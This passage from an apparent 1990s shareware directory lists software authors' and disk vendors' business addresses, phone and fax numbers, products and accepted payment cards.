+ Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 713-524-6398 + + Products: Ancient Yacht, Ancient Yacht , A Day at the + Races, A Day at the Races , Penny Penguin's Math Bingo + <95>, Penny Penguin's Math Bingo, Roxie's ABC Fish, Roxie's ABC + Fish , Roxie's Math Fish, Roxie's Math Fish , + Roxie's Reading Fish, Roxie's Reading Fish + Author: LatticeWork Software + Address: P.O. Box 362, Lafayette Hill, PA 19444 + + Products: Day By Day, Dear Diary, Little Black Book, q&dBase + for Windows, Teach Your Children, WebForms, WinBrowse, + WInvoices + Author: Q&D Software Development [Dave Verschleiser] + Address: 10-B Sentinel Court, Chatham, NJ 07928 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, MasterCard, Optima, Visa + Queries: 201-635-1824 + + Appendix A, "Author addresses" 683 + + + + Product: Flexitime/Time Logging + Author: HJS Systems + Address: 15 Falcon Close, Nuneaton, CV11 6TE UNITED KINGDOM + Orders & queries: +44-(0)1203-388031 + Fax: +44-(0)1203-352326 + + Products: Backer, Depleter, Good Credit, ShareMan + Author: Cordes Development [Bernd J. Cordes] + Address: Wiesingerweg 34, 20253 Hamburg, GERMANY + Orders & queries: +49-40-494370 + Accepts: MasterCard, Visa + Fax: +49-40-494370 + + Products: Disk Piecharter, Disk Piecharter + Author: Zorn Software [Hans Zorn] + Address: Overtoom 529 1054 LK, Amsterdam, THE NETHERLANDS + Orders: +31-206189658 (orders only, please) + Fax: +31-206189658 + + Product: Business Clock Link + Author: BizMark Development [Mark Hicks] + Address: P.O. Box 182, Princeton, LA 71067 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 318-949-4400 + Queries: 318-949-4399 + + Products: AA-Array.DLL, AAVBSORT.DLL + Author: AA-Software International + Address: 12 ter Domaine Du Bois Joli, 06330 Roquefort-Les-Pins, + FRANCE + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: +33-93-77-19-78 + + Products: SmartDraw, SmartDraw 95 + Author: SmartDraw Software Inc. + Address: 9974 Scripps Ranch Blvd #35, San Diego, CA 92131 + Orders: 800-501-0314 (orders only, please) + Accepts: American Express, MasterCard, Optima, Visa + Fax: 619-549-2830 + Queries: 619-549-0314 + + Products: ASTRO, ASTRO For Windows, CJNFonts, NUMERO UNO, SCP + Author: Christopher J. Noyes Software [Christopher J. Noyes] + Address: 144 Union Street, Store A, Brooklyn, NY 11231 + Orders & queries: 718-625-2262 + Accepts: MasterCard, Visa + Fax: 718-625-6766 + + Product: Hubble + Author: Hubble Software Company [Griengsak Narasirisinlapa] + Address: P.O. Box 1654, Denton, TX 76202 + + Appendix A, "Author addresses" 684 + + + + Product: Screen Saver Sampler + Author: Damsel Software Group + Address: P.O. Box 713, Concord, NH 03302-0713 + Orders & queries: 603-485-2677 + Fax: 603-485-2677 + + Product: ENTER-EASE + Author: KAYL SOFTWARE + Address: 8380 Northgate Ave. #25, Canoga Park, CA 91304 + Orders: 800-242-4775 (orders only, please) + Accepts: MasterCard, Visa + + Product: SuperSet - Environment Extender + Author: Ross Leidy + Address: 1966 Staunton Road, Cleveland Heights, OH 44118 + + Product: Chores & Rewards + Author: K. Jeff Hayes + Address: 1055 Business Highway 64 East, P.O. Box 1459, Wendell + NC 27591 + Orders & queries: 919-365-6027 + Fax: 919-365-6082 + + Product: MOZART (Virtuoso Edition) + Author: David Webber + Address: 484 Warrington Rd, Culcheth, Warrington, WA3 5RA + UNITED KINGDOM + + Product: Silver Wolf Desktop + Author: Silver Wolf Software + Address: P.O. Box 4232, Laguna Beach, CA 92652 + Accepts: MasterCard, Visa + Fax: 714-376-9230 + + Product: Button Manager for Windows + Author: AKC Applied Knowledge Corporation [Darin Ellis] + Address: 6128 Red Willow Drive, Orleans, Ontario K1C 7J8 + CANADA + Orders: 800-2424-PSL (orders only, please) + Fax: 713-524-6398 + Queries: 613-841-6020 + + Products: Program Group Specialist, RI-VB Database Toolkit + v1.1, RUF100.ZIP, SLIB10.ZIP + Author: MIS Resources International [Wayne Edwards] + Address: 570 Colonial Park Drive, Ste 301, Roswell, GA 30075 + Orders & queries: 404-594-7500 + Fax: 404-587-1932 + + Product: ModemSta + Author: TeddyWare [Ted Johansson] + Address: Sveavagen 66, S-182 62 DJURSHOLM, SWEDEN + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Appendix A, "Author addresses" 685 + + + + Products: Anim. Multiplication & Division, Animated Alphabet, + Animated Bugs, Animated Clock, Animated Math, Animated Memory + Game, Animated Money, Animated Shapes, Animated VGA Memory + Game, Animated Words + Author: FLIX Productions + Address: 601 Ranch Road, DelValle, TX 78617 + + Product: Computer Dictionary for Windows + Author: Gary FitzGerald + Address: 553 Haverstraw Rd., Suffern, NY 10901 + Orders & queries: 914-357-4171 + + Product: Safe Program + Author: Regnoc Software + Address: PO Box 1253, San Ramon, CA 94583 + Orders: 800-242-4775 (orders only, please) + Accepts: Discover, MasterCard, Visa + Fax: 713-524-6398 + Queries: 510-806-0713 + + Product: Contact Browser + Author: Moore Software Solutions [Ric Moore] + Address: P.O. Box 501783, San Diego, CA 92150-1783 + Orders & queries: 619-672-1479 + Fax: 619-672-1479 + + Product: The Electronic Square + Author: Electronic Creativity Products [David Archer] + Address: P.O. Box 1734, Lynnwood, WA 98046 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 206-778-4013 + + Product: Grow'Em + Author: Paul Postuma + Address: 16 Fullyer Drive, Quispamsis, N.B., E2G 1Y7 CANADA + Queries: 506-849-7087 + + Appendix A, "Author addresses" 686 + + + + Product: Inventory Interface + Author: Data Interface + Address: 45074 Middlebury, Canton, MI 48188-3215 + Orders & queries: 313-981-3615 + Accepts: American Express, MasterCard, Optima, Visa + Fax: 313-981-3615 + + Products: ACTION Process Automator, DATABASE BROWSER, GARDENING + BUSINESS, Money Organizer, WordLink(TM), Zip Server(TM) + Author: Redei Enterprises + Address: 1424 Brett Pl., Suite 359, San Pedro, CA 90732 + Orders & queries: 310-832-6984 + Fax: 310-832-6984 + + Product: ListBuilder + Author: Younkin Enterprises + Address: P.O. Box 205, CedarBrook, NJ 08018 + Orders: 713-524-6394 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 713-524-6398 + Queries: 609-262-1097 + + Product: File_Handle Filer/Finder/Shell + Author: Hasoft [Arjen van Andel] + Address: Meeuwensedijk 10, 4268 GV MEEUWEN, THE NETHERLANDS + Orders & queries: +31-(0)416-351-469 + Accepts: American Express, Diners Club, Discover, MasterCard, + Optima + Fax: +31-(0)416-351-469 + + Product: J-Works + Author: MicroWorks Inc. + Address: 3913 Country Park Lane, Murfreesboro, TN 37129-4718 + Orders & queries: 615-896-3966 + Fax: 800-701-3006 + + Products: CommEx, File-Ex, SuperDIR + Author: Cottonwood Software + Address: P.O. Box 6546, Leawood, KS 66206-0546 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, MasterCard, Optima, Visa + Fax: 913-663-3747 + Queries: 913-663-3022 + + Product: Frenetic Screensaver + Author: Seraline Pty Ltd + Address: PO Box 282, Ryde, NSW 2112, AUSTRALIA + Fax: +61-2-879-4481 + Queries: +61-2-879-4482 + + Appendix A, "Author addresses" 687 + + + + Product: I Ching Empower Tool + Author: Roger Norton Consulting + Address: P.O. Box 363, Newton, IL 62448-0363 + Orders: 800-242-4775 (orders only, please) + Accepts: Discover, MasterCard, Visa + Fax: 618-783-3932 + Queries: 618-783-3932 + + Product: Playground + Author: Object International, Inc. + Address: 7301 Burnet Road, 102-259, Austin, TX 78757 + Orders: 512-795-0202 (orders only, please) + Accepts: American Express, MasterCard, Optima, Visa + Fax: 512-795-0332 + + Products: 2col, JETCOL + Author: ARCaine Technology + Address: 960 Neilson St., Albany, CA 94706 + Orders: 410-661-2224 (orders only, please) + Accepts: Discover, MasterCard, Visa + Queries: 510-527-9859 + + Product: SETUP.EXE - Free 19k Bootstrap + Author: Chapter One Developments Ltd. [Mike Chapman] + Address: 27 Gorse Drive, Smallfield, Surrey RH6 9GJ ENGLAND + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: (44)-0-1342-844-659 + Queries: (44)-0-973-222937 + + Products: Folders, Link, Power Edit + Author: Target Software [Robert Brinegar] + Address: Fuji Copo 3D Wakamatsu-cho 16-4 Shinjuku, Tokyo 162, + JAPAN + Orders & queries: +81-3-3207-4553 + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: +81-3-3207-4553 + + Products: DataBrowser, Know It All, Wonder Word + Author: Software Avenue, Inc. [Gregory Lee] + Address: Post Office Box 1324, Gilbert, AZ 85234 + Orders: 800-813-0876 (orders only, please) + Accepts: Discover, MasterCard, Visa + Queries: 602-813-0876 + + Product: The Lights Go Down + Author: Thomas Hoevel Software-Development [Thomas Hoevel] + Address: Saturnstr. 45, 53842 Troisdorf, GERMANY + Orders: 800-TOREGISTER (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Appendix A, "Author addresses" 688 + + + + Products: AsciiConvert, Bubble Chart, Cards+More, Docudex + Document Imaging, Docuthek Document Imaging, E-report, Gif+Web + Transparent GIF Editor, Infothek Information Manager, MapDraw, + MathWiz, SeekWell Universal Query, StockQuest, TIFFmaker, + VuGrafix Image Viewer, WebParse, WebPen, WinCopy Screen + Capoture + Author: Informatik Inc. + Address: 304 Heritage Place, P.O. Box 868, Devon, PA 19333 + Orders & queries: 610.640.0339 + Accepts: MasterCard, Visa + Fax: 610.610.0339 + + Products: Bootit, Extract It + Author: TeraByte Unlimited + Address: 258 N. Saturmino Dr., Palm Springs, CA 92262 + + Product: NuMorse Morse Code trainer + Author: A. Lacy + Address: 58 Bilbrook Road, Codsall, Wolverhampton, WV8 1ER + UNITED KINGDOM + + Products: Dave Dude, Dave Dude for Win95 + Author: APG Entertainment [Christian Naumann and Philipp + Schroeder] + Address: Egenhoferstr. 15, 81243 Munich, GERMANY + Orders: 800-2424-PSL (orders only, please) + Accepts: Discover, MasterCard, Visa + + Product: CRISP-R REAL ESTATE ACCOUNTING + Author: JAMES W. FUNSTEN SOFTWARE + th + Address: 140 Second Street, 5 floor, San Francisco, CA 94105 + Orders & queries: 415-974-6201 + Accepts: MasterCard, Visa + Fax: 415-495-6651 + + Products: CONTRACT BRIDGE, PCDESK, PLOTTER, READ + Author: Robert Lindsay Wells + Address: 1405 Lynn Avenue, Clearwater, FL 34615 + Orders: 800-2424-PSL (orders only, please) + Accepts: Discover, MasterCard, Visa + Queries: 813-447-0604 + + Product: DXF Bill of Materials Generator + Author: Annabec Business Services + Address: PO Box 85, Millersburg, OH 44654 + Orders & queries: 216-674-5444 + Accepts: MasterCard, Visa + Fax: 216-674-2747 + + Product: WinCap+ + Author: The CodeWorks+ Ltd. [David Barratt,] + Address: 413, Devonshire Road, North Shore, BLACKPOOL, Lancs., + FY2 0JP, ENGLAND + + Appendix A, "Author addresses" 689 + + + + Product: The Wine Window + Author: Prospect Software + Address: 1314 E. Marietta, Peoria Heights, IL 61614 + Orders & queries: 309-682-8151 + Fax: 309-682-7641 + + Products: Baseball Hotline Information, BOXES, BOXES II, BOXES + III, Congressional Hotline Info, Dino Cards, Dino Match, Dino + Numbers, Dino Spell, Dino Trilogy, VIRUS: The Game, WORDS + Author: DynoTech Software [David Carlson] + Address: 1105 Home Ave, Waynesville, MO 65583-2231 + Orders: 800-396-6832 (orders only, please) + Accepts: Discover, MasterCard, Visa + Fax: 573-774-3052 + Queries: 573-774-5001 + + Product: Qbrws + Author: Ariadne-Beratung + Address: Huegelweg 47, CH4143-Dornach, SWITZERLAND + Accepts: American Express, MasterCard, Optima, Visa + Fax: ++41-61-702-05-51 + + Product: FBScheduler + Author: Forrest D. Bruner + Address: 643 Washington Street, Hope, IN 47246 + Orders: 800-242-4775 (orders only, please) + + Product: Mouse Math + Author: Hufnagel Software + Address: 501H Main Street, PO Box 747, Clarion, PA 16214 + Orders & queries: 814-226-5600 + Accepts: MasterCard, Visa + Fax: 814-226-5551 + + Product: Crowndale Tales : ESCAPE! + Author: Crowndale Productions [Paul and Cynthia Lurix] + Address: P.O. Box 719, Brookshire, TX 77423 + Orders & queries: 713-346-1552 + Fax: 713-356-1607 + + Products: Exile: Escape From the Pit, Exile: Escape From the + Pit + Author: Spiderweb Software + Address: 14 Easton Avenue #202, New Brunswick, NJ 08901 + Orders: 414-963-4429 (orders only, please) + Accepts: MasterCard, Visa + Queries: 908-545-7552 + + Appendix A, "Author addresses" 690 + + + + Products: EZ-Index - Popular Photography, EZ-Index - Canadian + Geographic, EZ-Index - National Geographic, EZ-Index for + Traveler + Author: E-Z Access Software Ltd. [Leo Taylor] + Address: 5185 Hwy. 127, St. Andrews, NB E0G 2X0 Canada + Orders & queries: 506-529-3432 + Accepts: MasterCard, Visa + + Product: WCanasta + Author: Wilfried Lotermoser Software + Address: Spechtweg 7, 66287 Quierschied, Germany + Accepts: Visa + Fax: +49-6897-66897 + + Products: Computerized Christmas Cards, Computerized Valentine + Cards, Puffwort's Evil Scheme, Visual Illustrations, Word + Search Puzzle Maker + Author: Impact D. Publishing + Address: P.O. Box 1596, Palm Desert, CA 92261 + Queries: 619-346-6609 + + Product: DeltaCad + Author: Midnight Software, Inc. + Address: P.O. Box 77352, Seattle, WA 98177-0352 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 206-361-0796 + Queries: 206-361-0882 + + Product: Time Keeper + Author: Custom Computer Solutions + Address: P.O. Box 678, Calverton, NY 11933 + Orders & queries: 516-369-4191 + Fax: 516-369-4191 + + Product: Kidproof for Windows + Author: Applied Softworks Inc. + Address: P.O. Box 2508, Santa Clara, CA 95055-2508 + Orders & queries: 408-554-1010 + Fax: 408-554-1010 + + Product: Bird's-Eye-View + Author: Toham Soft + Address: 15507 S. Normandie Ave. #232, Gardena, CA 90247 + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Appendix A, "Author addresses" 691 + + + + Product: No*STOP SUPRDUPE + Author: NONSTOP NETWORKS LIMITED + Address: 1001 Broad St., Suite 406, Utica, NY 13501 + Orders & queries: 212-481-8488 + Accepts: MasterCard, Visa + Fax: 212-779-2956 + + Product: IPIN PhotoCalendar + Author: Telnet Computer Consultant + Address: P.O. Box 51863, Irvine, CA 92619-1863 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 714-651-9931 + Queries: 714-651-9931 + + Product: Units & Volumes + Author: X Libris [Kenneth L. Holladay] + Address: PO Box 19306, Plantation, FL 33318 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Product: Assistant For Windows + Author: Thomas Koch + Address: Konrad- Celtis- Strasse 7, 81369 Munich, GERMANY + Orders & queries: 0049897602709 + Accepts: Discover, MasterCard, Visa + Fax: - + + Products: DELEGATOR for Windows, Family Scheduler + Author: Madrigal Soft Tools Inc. + Address: #201 1290 Broad St., Victoria, B.C., V8W 2A5, CANADA + Orders: 800-2424-PSL (orders only, please) + Accepts: MasterCard, Visa + Fax: 604-920-3912 + Queries: 604-920-3910 + + Product: KBBLH120.ZIP + Author: Joseph G. Savino + Address: 1253 Springfield Ave, Ste. 250, New Providence, NJ + 07974 + + Products: Verbal Vanquish, WinAlter + Author: James Bair Software + Address: P.O. Box 203, Shelton, CT 06484-0203 + Accepts: MasterCard, Visa + Fax: 203-452-1531 + + Appendix A, "Author addresses" 692 + + + + Product: FaxMail for Windows + Author: ElectraSoft + Address: 3207 Carmel Valley Drive, Missouri City, TX + 77459-3068 + Orders & queries: 713-261-0307 + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 713-499-5939 + + Product: Super Marble Solitaire + Author: Wrenware [Rennie A. Sawade] + Address: P.O. BOX 24455, Lyn-Mayfield, OH 44124 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 216-371-0490 + + Products: GTI Desktop+, GTI WordGrid + Author: GTI Ltd + Address: 9/18 Mavisbank Gardens, Festival Park, Glasgow, G20 + 0ET, SCOTLAND + Orders: 800-867-3447 (orders only, please) + Accepts: American Express, MasterCard, Optima, Visa + Queries: +44-973-829351 + + Product: BYWHEN + Author: W.S.B. Communications + Address: 2201 Shoreline Drive, P.O. Box #1594, Alameda, CA + 94501-1594 + Fax: 510.523.9345 + + Product: Power Planner + Author: Sphygmic Software Limited + Address: 50, Tabernacle Street, Skewen, West Glamorgan, SA10 + 6UF UNITED KINGDOM + Orders: 803-699-6395 (orders only, please) + Accepts: MasterCard, Visa + Fax: 803-699-5465 + Queries: +44-1792-323-002 + + Products: BirthdayMinder, JetLauncher + Author: Saturday*s Child [Froma Bessel] + Address: P.O. Box 221, Glen Head, NY 11542 + Orders: 713-524-6394 (orders only, please) + Accepts: MasterCard, Visa + Fax: 713-524-6398 + Queries: 516-671-3861 + + Appendix A, "Author addresses" 693 + + + + Product: TrackEquip + Author: John A. Tulley + Address: 3 Tipping Brow, Mobberley, Nr. Knutsford, Cheshire, + WA16 7JE, UNITED KINGDOM + Orders & queries: +44-(0)1565-880012 + Fax: +44-(0)1565-880012 + + Products: Red Hand, World Clock + Author: Hard-Drive Software + Address: 2 Old Ansford Inn, Castle Cary, Somerset BA7 7JG + ENGLAND + Orders: +44-01963-351470 (orders only, please) + Accepts: MasterCard, Visa + Fax: +44-01963-351470 + Queries: +44-O1963-351470 + + Product: Intelliship + Author: Intelliware + Address: 13104 Philadelphia St., Suite 219, Whittier, CA + 90601-4324 + Orders & queries: 310-696-2222 + Accepts: MasterCard, Visa + Fax: 310-696-3314 + + Product: CD Wizzard CD Player for Win + Author: BFM Software + Address: 38602 Lancaster Drive, Farmington Hills, MI 48331 + Queries: 810-661-1797 + + Products: Discover Juggling 1 - Balls, Discover Karate 1 - + White Belt + Author: Midi Age Productions [Miles Eddy] + Address: P O Box 3562, Littleton, CO 80161 + + Products: PSA Cards for Windows 3.1, PSA Cards for Windows + 95/NT + Author: PSA Software [William L. Rogers] + Address: PO Box 271905, Fort Collins, CO 80527-1905 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 970-282-1298 + + Product: Phone Book Maker + Author: Ronnie Tsedek + Address: 5151 White Oak Ave. #212, Encino, CA 91316 + + Product: ARTSAVER Nature Screen Saver + Author: Scidel Technologies Inc. [Roger Bessette] + Address: 152, 61 Ave Nord St-Joseph du Lac, P.Q., J0N-1M0 + CANADA + Orders: 800-372-4335 (orders only, please) + Accepts: Visa + Fax: 514-473-6403 + Queries: 514-473-8119 + + Appendix A, "Author addresses" 694 + + + + Product: Wilbur + Author: RedTree Development Inc. + Address: 2 Timberline Crescent, Fernie, B.C., V0B 1M1, Canada + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 604-423-6519 + + Product: The MetaKit Library + Author: Meta Four Software [Jean-Claude Wippler] + Address: Meekrap oord 6, 3991 VE, Houten, The Netherlands + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: +31-30-635-2337 + + Product: XferPro + Author: Sabasoft, Inc. + Address: 924 Bayhill Avenue, Naperville, IL 60565 + Orders: 708-983-3573 (orders only, please) + Accepts: American Express, MasterCard, Optima, Visa + + Products: AGA (Orifice meters), GasWat (Gas-Water + Interactions), GOW (Gas-Oil-Water properties), ISO (Orifice + meters) + Author: NorDecor [Bjarne K. Berge] + Address: 206 Cliff Ave., Valley Springs, SD 57068 + + Appendix B, "Vendor addresses" 695 + + + + + + Appendix B + Vendor addresses + + This appendix lists each ASP-approved disk vendor. These + vendors have agreed to abide by ethical standards when offering + shareware. + + + $ave On $oftware + Address: PO Box 1312, Wilkes Barre PA 18703-1312 + Phone: 717-822-9531 + + A.M.U.G.CD INC + th + Address: 4131 N 24 St #A-120, Phoenix AZ 85016 + Phone: 602-553-0066 + + Alphon Edugames + Address: 221 Ridley Road, Bridgeman Downs QLD 4035 AUSTRALIA + Phone: 011 61 732632744 + + Alternative Personal Software + Address: RR #3 SideRoad 27, #9126, Orton ON L0N 1N0 CANADA + Phone: 519-855-4343 + + American Systems and Software + Address: 612 S Bowie St, Weatherford TX 76086 + Phone: 817-599-5858 + + Andromeda Software, Inc + Address: PO Box 270672, Fort Collins CO 80527-0672 + Phone: 716-691-4510 + + Ares Informatica S.L. + Address: C/ Bellaterra 33, Cornella BARCELONA 08940 SPAIN + Phone: 34-9-3-376-81-50 + + Aringna + Address: PO Box 78 Lutong, Miri SARAWAK 98107 MALAYSIA + Phone: 6-085-615861 + + Ascencion Media Productions + Address: Boterstraat 12, Schiedam Z.H. 3111NC NETHERLANDS + Phone: 31-10-473-8579 + + ASM Argentina + Address: Escobar 3155, Capital Federal BA C.P.1419 ARGENTINA + Phone: 54-1-572-9417 + + Astoria Software Inc + Address: 333 SW Fifth Ave Ste # 608, Portland OR 97204 + Phone: 503-464-4000 + + Appendix B, "Vendor addresses" 696 + + + + Atanak Software Inc + Address: 41 Melanie Cres, Kanata ON K2L 2E4 CANADA + Phone: 613-831-0474 + + Automation Electric Co Ltd + Address: 446/67-68 Park Ave II, Sukhumvit Rd 71 Klongton + Klongtney, Bangkok 10110 THAILAND + Phone: 662-381-5233 + + Awakenings Inc + Address: 2297 Sandia Drive, Prescott AZ 86301 + Phone: 520-776-7164 + + Aztech New Media + Address: 1 Scarsdale Road, Don Mills ON M3B 2R2 CANADA + Phone: 416-449-4787 + + Barbara's Choice + th + Address: 1039 SE 196 Ave, Portland OR 97233 + Phone: 503-666-0596 + + Bit Bang (Branch of Canadesign) INC + Address: PO Box 306 Station Delorimier, Montreal QB H2H 2N7 + CANADA + Phone: 514-598-8406 + + Bits & Bytes Shareware + Address: 2077 W. 76 STREET, HIALEAH FL 33016 + Phone: 305-822-0122 + + Bright Idea! Software + Address: 5339 Prospect Road, Ste 197, San Jose CA 95129 + Phone: 408-252-0542 + + Brightspark Computers & Pick-A-Disk + Address: Unit 7, 10-12 Dewar Street, Morley Perth WEST + AUSTRALIA 6062 AUSTRALIA + Phone: 011-09-375-1178 + + BroCo Software + Address: PO Box 446, 3760 AK SOEST NETHERLANDS + Phone: 31 35-6026650 + + Buckeye Software + Address: PO BOX 672, ANTWERP OH 45813 + Phone: 419-258-2506 + + Budgetware + Address: 9 Albermarle Street, Newtown NSW 2042 AUSTRALIA + Phone: 011-612-519-4233 + + Appendix B, "Vendor addresses" 697 + + + + Buster Software + Address: PO Box 131, Verbena AL 36091-0131 + Phone: 800-598-7238 + + C&C Infomedia Inc + Address: 4 F Namsong Bldg, 88 Nonhyun-Dong, Kangnam-Ku SEOUL + KOREA + Phone: 82-2-516-6638 + + Campbell's Shareware Center + Address: 189 Rural Street Box 57, Austin IN 47102 + Phone: 812-794-3739 + + CD Rom Paradise SRL + Address: PO Box 10177, 20100 Milano ITALY + Phone: 39 2 70603189 + + CD World Publishing Plus Corp + Address: 5018 S Price Road, Tempe AZ 85282-7445 + Phone: 602-839-3031 + + CDV Software GmbH + Address: Neureuter Str. 37b, 76185 Karlsruhe GERMANY + Phone: 0721-972240 + + Central Computerware + Address: 183 South Main St, Templeton MA 01468 + Phone: 508-939-2138 + + Cimco + Address: PO Box 92, Jewett IL 62436 + Phone: 217-849-2333 + + CompuData ltda + Address: Tucapel 564 Oficina 77, PO Box 2706, Concepcion CHILE + Phone: 56 41-246035 + + CompuSoft + Address: 6209 15TH AVE NW, Seattle WA 98107 + Phone: 206-784-8140 + + Compustuff + Address: 2759 Medina Road, Medina OH 44256 + Phone: 216-725-7729 + + Computer Habit Inc + th + Address: 8100 S 84 St, Omaha NE 68128 + Phone: 402-592-7976 + + Computer Shareware Library + Address: Shop 1/44 Lincoln Street Strathpine, BRISBANE QLD 4500 + AUSTRALIA + Phone: 07 3881 3694 + + Appendix B, "Vendor addresses" 698 + + + + Computer Software Library + Address: PO BOX 162, TIMARU 8615 NEW ZEALAND + Phone: +64-3-615-9333 + + Computer Solutions Dorth + Address: POSTBUS 59, NL-7213 GORSSEL NETHERLANDS + Phone: 31 57549-4545 + + Computer Solutions Software Gm + Address: Gartenstr. 2, GRAFING W-8018 GERMANY + + CopyCats + Address: Postbus 1088, Heerhugowaard NL1700BB NETHERLANDS + Phone: 31 2207 45993 + + Cross Country Shareware + Address: 2 - 53 Victoria Rd South, Guelph ON N1E 5P7 CANADA + Phone: 519-837-0777 + + D & J Software + nd + Address: 7501 142 Avenue N #357, Largo FL 34641 + Phone: 813-535-3961 + + DataMatta + Address: 386 North Main St, Woonsocket RI 02895-2003 + Phone: 401-766-8571 + + Digital Expressions Inc + Address: 2107-B Powers Ferry Road, Marietta GA 30067 + Phone: 404-577-4914 + + Direct Software Distribution + th + Address: 214 5 Ave, Columbia TN 38401 + + Dispro Software Ltda. + Address: AV. PAULISTA, 2073-11 ANDAR, CJ 1101 - ED. HORSA I, + SAO PAULO SP 01395-900 BRASIL + Phone: 251 2344 + + Distribuidora OK-Soft C.A. + Address: Centro Empresarial La Lagunita, Diso 3 No 302 + Urbanizacioz La Laqun, Caraeaj DISTRITO FEDERA 1080 VENEZUELA + Phone: 02-963-7187 + + DOSgg ProgrammaTheek + Address: Bremlaan 14, Rhenen 3911 XH NETHERLANDS + Phone: 31 8376 17429 + + DP Tool Club + Address: 99 Rue Parmentier, Villeneuve D'Ascq F-59493 FRANCE + Phone: 33-2084-5533 + + Appendix B, "Vendor addresses" 699 + + + + DTP Studio spol. sr.o. + Address: Nademlejnska 7, Prague 9 19800 CZECH REP + Phone: 42-2-862931 + + Eagle Shareware + Address: 2345 Moorpark Way, Henderson NV 89014-3630 + Phone: 702-434-4791 + + Easy Life Inc + Address: 4604 Deerfield Circle, Sioux Falls SD 57105 + Phone: 605-339-2430 + + Encode Business Systems Inc + Address: 434 West St North, Orillia ON L3V 5E8 CANADA + Phone: 705-327-7628 + + Eracom Sdn. Bhd. + Address: 35A, Jalan Jejaka 9, Taman Maluri, Kuala Lumpur 55100 + MALAYSIA + Phone: 603-9853108 + + Extrabyte Sdn.Bhd + Address: 2 Jalan SS21/8, Damansara Utama, Petaling Jaya + SELANGOR 47400 MALAYSIA + Phone: 011-603 718-3527 + + Farrell, Claire + Address: PO Box 2542, Dartmouth NS B2W 4B7 CANADA + Phone: 902-462-4453 + + Gamebox c/o Galcom + Address: Wasserfurristr.50, Winterthur 8406 SWITZERLAND + Phone: 41-1444-26-44 + + Gem Shareware Software + Address: 433 Highwood Dr, Slidell LA 70458-1708 + Phone: 504-649-9777 + + Gunzameory Computer Institute + Address: Yoido PO Box 392, Yongdungpo-ku, Seoul KOREA + Phone: 822-714-7539 + + H & J Software + Address: 311 Marlow Court, Chesapeake VA 23320 + Phone: 804-482-5798 + + Halee Marketing + Address: 50 Waimza Street, New Plymouth TARANAKI 4601 NEW + ZEALAND + Phone: 067536311 + + Halpenny Sales + Address: 23275 Friendship Road, Pilot Point TX 76258-9241 + Phone: 817-440-2995 + + Appendix B, "Vendor addresses" 700 + + + + Hamsoft Shareware Library + Address: 580 Lowe Street, Hastings 4201 NEW ZEALAND + Phone: 64-6-876-9808 + + Hill Computer Goodies + Address: Eastland Mall, North Versailles PA 15137 + Phone: 412-678-8003 + + Hourglass Software + Address: 20231 Oak River Ct, Matoaca VA 23803 + Phone: 804-590-9041 + + HRS Software Club + Address: 10 Tangmere Crescent, Markham ON L3R 6Y9 CANADA + Phone: 905-478-8292 X25 + + Husco Austria Handelsgesellshcaft m.b.H. + Address: Bosendorferstrasse 4, Vienna 1010 Wien AUSTRIA + Phone: 431/505 43 11 + + IDG Communications Nederland + Address: Schipholweg, Haarlem 2034 LS NETHERLAND + Phone: 023-366814 + + Independent Micro Consulting (IMC) + Address: 134 Upland Drive, MEDICINE HAT ALBERTA T1A 3N7 CANADA + Phone: 403-527-2826 + + Info Magic Inc + Address: 11950 N Hwy 89, Flagstaff AZ 86004 + Phone: 520-526-9565 + + JCS Marketing, Inc + Address: PO Box 1216, Lakeville MN 55044 + Phone: 612-469-5898 + + Jimaz + Address: HERMANOVA 37, PRAHA 7 170 00 CZECHOSLOVAK + Phone: 422379498 + + Jojarra Group + Address: 8 Marlock Rd, Woodlands WA 6018 AUSTRALIA + Phone: 09-383-9993 + + Joshua Advanced Data Systems Ltd Oy + Address: Ruskontie 31, Nousiainen SF-21270 FINLAND + Phone: 358-21-6375754 + + Kelly Data GmbH + Address: Lena-Christ-Stre 50, D-82152 Martinsried GERMANY + Phone: 49-89-895-6260 + + Appendix B, "Vendor addresses" 701 + + + + KWN Systems Inc + Address: 220 Stonehurst Blvd, Freehold NJ 07728 + Phone: 800-245-9399 + + Lady-J Software + Address: PO Box 6079, Auburn CA 95604 + Phone: 916-887-1104 + + Laservend, Inc + Address: 1800 S State St, Orem UT 84058-8013 + Phone: 801-764-9080 + + Lilliput Shareware Distribution + Address: 3-26-2 MINAMI, SATTE CITY SAITAMA PREF. 340-01 JAPAN + Phone: 81-480-43-6225 + + Limelight Publishing + Address: 2718 Rand Road, Indianapolis IN 46241 + Phone: 317-487-8800 X200 + + LT-1 Enterrpises Inc + Address: 118 West Washington St, MARENGO IL 60152 + Phone: 815-568-7000 + + M & M Computing + Address: 43 Maple Street, Newburgh NY 12550 + Phone: 914-569-0510 + + M & M Software + Address: 3252 Los Coyotes Drag, Long Beach CA 90815 + Phone: 310-420-2655 + + M.A.D. Shareware + Address: PO Box 13707, Silver Spring MD 20911 + Phone: 301-587-0545 + + Manaccom Pty Ltd + 